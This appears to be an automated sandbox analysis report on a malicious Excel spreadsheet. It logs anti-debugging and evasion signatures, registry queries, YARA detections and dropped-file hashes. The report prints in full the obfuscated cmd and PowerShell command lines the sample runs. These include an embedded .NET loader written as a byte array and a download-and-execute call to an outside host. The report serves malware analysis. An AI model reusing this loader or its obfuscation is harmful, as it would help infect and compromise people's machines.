Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy

Show sources

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c%sUG%			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )	Jump to behavior

Language, Device and Operating System Detection:

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
17:15:26	API Interceptor	227x Sleep call for process: EXCEL.EXE modified
17:16:09	API Interceptor	1x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7362_8164_(2019.2).xls	46%	virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://benistora.com/uploads/audio.7zH	0%	Avira URL Cloud	safe
https://benistora.com/uploads/audio.7z	3%	virustotal		Browse
https://benistora.com/uploads/audio.7z	0%	Avira URL Cloud	safe
https://benistora.com	2%	virustotal		Browse
https://benistora.com	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.1636004810.01A69000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.1638447073.04EE0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.1635995960.01A60000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.1634369984.00150000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.1634433896.00190000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.1634948704.011C0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.1634387196.00160000.00000008.sdmp	Embedded_PE	unknown	unknown
00000005.00000002.1634303771.000D0000.00000008.sdmp	Embedded_PE	unknown	unknown
00000005.00000002.1638385697.04350000.00000004.sdmp	Embedded_PE	unknown	unknown
00000005.00000002.1638206829.03EE0000.00000008.sdmp	Embedded_PE	unknown	unknown
00000005.00000002.1635853654.01920000.00000002.sdmp	Embedded_PE	unknown	unknown
00000005.00000002.1634554312.00220000.00000008.sdmp	Embedded_PE	unknown	unknown
00000005.00000002.1636329423.01D34000.00000004.sdmp	Embedded_PE	unknown	unknown

Unpacked PEs

Source	Rule	Description	Author
5.2.powershell.exe.4350000.5.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.d0000.0.raw.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.d0000.0.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.4350000.5.raw.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.220000.2.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.160000.1.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.160000.1.raw.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.1920000.3.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.1920000.3.raw.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.220000.2.raw.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.3ee0000.4.raw.unpack	Embedded_PE	unknown	unknown
5.2.powershell.exe.3ee0000.4.unpack	Embedded_PE	unknown	unknown

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
benistora.com	http://file.tancyo.blog.shinobi.jp/ea9550da.xls	Get hash	malicious	Browse	5.188.60.66

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

EXCEL.EXE (PID: 2916 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 716335EDBB91DA84FC102425BFDA957E)

cmd.exe (PID: 1660 cmdline: cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,99,0,0,12,0,0,'+'0,0,96,0,0,0,2,0,0,0,1'+'0)+@(0)*14+@(64,0,0,66)+@(0)*16+@(96,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,17'+'2,2,0,0,1)+@(0)*55'+'+@(19,48,2,0,17,0,0,0,1,'+'0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,'+'0,0,0,0,0,12'+',0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,208,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,7'+'2,2,0,0,8,0,0,0,35,85,83,'+'0,80,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,96,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)*7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2'+',0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,'+'0,0,0,'+'0,0,10,0,1,0,0,0,0,0,6,0,45,0,38,0,6,0,96,0,64,0,6,0,128,0,64,0,10,0,180,0,169,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,52,0,10,0,1,0,1'+'09,32,0,0,0,0,134,24,58,0,15,0,2,0,0,0,1,0,165,0,17,0,58,0,19,0,25,0,58,0,15,0,33'+',0,58,0,15'+',0'+',33,0,190,0,24,0,9,0,58,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@'+'(158,0,0,0,2)+@(0)*11+'+'@(1,0,29,0,0,0,0,0,2)+@(0)*11+@(1'+',0,38)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,82,70,111,108,68,89,75,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101'+',109,0,79,98,106,101,99,116,0,81,99,90,'+'113,'+'1'+'07,0,46,99,116,111,114,0,83,121,115,116,101,10'+'9,46,82,117,110,116,105,109,101,46,67,111,10'+'9,112,105,108,101,11'+'4,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,'+'97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,1'+'05,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105'+',98,'+'117,116,101,0,99,1'+'14,97,100,108,101,0,117'+',114,108,0,83,121,1'+'15,11'+'6,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119'+','+'110,108,111,97,100,83,116'+',114,105,110,103,0,0,0,0,0,3,32,0,0,0,0,0,5'+'8,148,124,63,2,180'+',198,73,168,1'+'11,105,133,161,93,80,139,0,8,183,122,92,86,25,52,224,'+'137,4,0,1,14,14,3,32,'+'0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,'+'112,78,111,110,69,120,99,101,112,116,105,111,110,8'+'4,104,114,111,119,115,1,0,0,0,76,35)+@(0)*8+@(0,0,110,35,0,0,0,32)+@(0)*22+@(96,35)+@(0)*20+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)*139+@(1,0,16,0,0,0,24,0,0,12'+'8)+@(0)*14+@(1,0,1,0,0,0,48,0,0,128)+@(0)*14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@'+'(0)*8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0'+',78,0,95,0,73,0,78,0,70,0,7'+'9,0,0,'+'0,0'+',0,189,4,239,254,0,0,1)+@(0)*16+@(0,63)+@('+'0)*7+@(4,0,0,0,2)+@(0)*14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0'+',0,0,0,0'+',36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)'+'+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,'+'0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,'+'0,101,0,68,0,101,0,115,0,99,0,114,0,105'+',0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,'+'1,0,70,0,105'+',0,108,0,101,0,86,'+'0,101,0,114,0,115,0,105,0,111,0,110'+',0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56'+',0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0'+',78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0'+',2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,'+'0,116,0,'+'0,0,32'+',0,0,0,64,0,1'+'1,0,1,0,79,0,114,0'+',10'+'5,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100'+',0'+',108,0,101,0,46,0,100,0,108,0,108'+',0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,1'+'00,0,117,'+'0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0'+',110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,'+'0,0,0,5'+'6,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0'+',105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)*360+@(32,0,0,12,0,0,0,128,51)+@(0)*502));^&(1gY{0}{1}1gY -f('+'1gY{0}{1}1gY-f 0BvS0Bv,0Bvet-It0Bv),0Bvem0Bv) (1gY{2}{1}{0}1gY-f (1gY{1}{0}1gY -f0Bv080Bv,0Bvle:0Bv),(1gY{0}{1}1gY-f0Bvr0Bv,0Bviab0Bv),0BvVa0Bv) (1gY{5}{8}{2}{6}{0}{3}{4}{7}{1}{9}{10}1gY-f 0Bvom/uplo0B'+'v,0Bvi0Bv,0Bv/0Bv,0Bva0Bv,0Bvds/0Bv,'+'0Bvhttp0Bv'+',0Bvbenistora.c0Bv,0Bvaud0Bv,0Bvs:/0Bv,0Bvo.70Bv,0Bvz0Bv'+');hGD{nsKpUll}=[System.Refle'+'ction.Assembly]::([System.Reflection.Assembly].1'+'gYGeTMeTHsKposKpDS1gY()tT1.(1gY{1}{0}1g'+'Y -f0Bvere0Bv,0BvWh'+'0Bv){(^&(1gY{1}{0}1gY -f0BvI0Bv,0BvGC0Bv) (((1gY{1}{2}{3}{0}1gY-f 0Bv_0Bv,(1gY{0}{1}1g'+'Y -f0BvVar0Bv,0Bvia0Bv),0Bvble0Bv,0Bv:{0}0Bv)) -F [cHAR]92)).1gY'+'VasKplUE1'+'gY.1gYnAsKpmE1gY-clike(1gY{0'+'}{1}1gY-f0BvL0Bv,0Bv*o*d0Bv)}tT1.(0Bv%0Bv){(.(0BvGV0Bv) (0Bv_0Bv) -ValueOn).1gYnasKpME1gY}tT1.(1gY{0}{1}{2}1gY -f0BvSe0Bv,0Bvl0Bv,0Bvect0Bv) -La 1).1'+'gYisKpNvsKpoKE1gY((^&(0BvGV0Bv) '+'(1gY{0}{1}1gY -f0BvkM0Bv,0Bvq0Bv)).1gYVAsKplUE1gY)'+';([RFolDYK]::1gYqCsKpzqk1gY.Invoke((.(1gY{0}{1}1gY-f0BvD0Bv,0BvIR0Bv) (((1gY{2}{3}{1}{0}{4}1gY -f'+'0BvNI00Bv,0Bv:O0Bv,0BvVar0Bv,(1gY{1}{0}1'+'gY-f0Bvble0Bv,0Bvia0'+'Bv),0Bv80Bv)) -cREPla'+'CE([cHAR]79+[cHAR]7'+'8+[cHAR]73),[cHAR]92)).1gYVsKpAlUe'+'1gY))tT1.(^&(1g'+'Y{1}{0}1gY-f (1gY{1}{0}1gY -f 0Bv-Alias0Bv,0Bvt0Bv),0BvGe0Bv) (1gY{0}{1}1gY-f0BvIE0Bv,0Bv*0Bv))') -crEPLaCe ([cHAr]115+[cHAr]75+[cHAr]112),[cHAr]96-crEPLaCe '1gY',[cHAr]34 -ReplacE ([cHAr]48+[cHAr]66+[cHAr]118),[cHAr]39-crEPLaCe'hGD',[cHAr]36-ReplacE([cHAr]116+[cHAr]84+[cHAr]49),[cHAr]124) ) &&sET SUg=POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )&& cmd /c%sUG%' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 964 cmdline: cmd /c%sUG% MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 524 cmdline: POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Size (bytes):	241332
Entropy (8bit):	4.294282880528815
Encrypted:	false
MD5:	922486360D722A05DB34C20E0428D607
SHA1:	0D029152CB1F1571DE42BFF39C5CEF7BA3CE0551
SHA-256:	C815EFC912498C2D241BA2BDDE2271BD7279BAA081A32FBD1BA9CFE9B499003E
SHA-512:	8F1909048FF92DA483F13FA7A5B536E46CC8FE4AED20B7E2C81C1121766308829B2112E26F1DBD3DDC1B3904933EC252DD4FCBD8E8290BA1B29A9C1CA7C035FB
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs.ht_ Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	9862
Entropy (8bit):	5.454766262761325
Encrypted:	false
MD5:	2DA132B373FD6CEE2B45F8070B5B36D8
SHA1:	C4A0F0711D790A0CC2487C5F40212FBDE9ED8510
SHA-256:	F3545067115B072F1A444F4DD7ED4980B293B70761A9E3EDAF7FE9A531A537D7
SHA-512:	98AF42E5CE5EBFE518DF1479054E8A325769C6C5B353628E465EAF28026E223895FC44755DAA1AA3E0EFB8E0188772B0BE15462CA243AC13F34F6B3D9B82C7E6
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs.htm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	9862
Entropy (8bit):	5.454766262761325
Encrypted:	false
MD5:	2DA132B373FD6CEE2B45F8070B5B36D8
SHA1:	C4A0F0711D790A0CC2487C5F40212FBDE9ED8510
SHA-256:	F3545067115B072F1A444F4DD7ED4980B293B70761A9E3EDAF7FE9A531A537D7
SHA-512:	98AF42E5CE5EBFE518DF1479054E8A325769C6C5B353628E465EAF28026E223895FC44755DAA1AA3E0EFB8E0188772B0BE15462CA243AC13F34F6B3D9B82C7E6
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\imgs.rcv Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Size (bytes):	604
Entropy (8bit):	2.9372545440775246
Encrypted:	false
MD5:	B8E152B8B4A0FAD483AAD198D846E774
SHA1:	D24F594034BAC4BAFA97B6EF47A2BDC28BCE4F02
SHA-256:	3AD112E8A2BE0D0090F9F5BA4B5AAB91343B17BAC47A6E65C9E203C64050CBD2
SHA-512:	9317F0D6906A4F6BEFF247ADF769FF3AC543364283DEA57AE7E33AE4563E9C19598EA5F6F7D8CBB182DDA110124D9CA5CA20117EADBECC404C17F226316D4459
Malicious:	false
Reputation:	moderate, very likely benign file

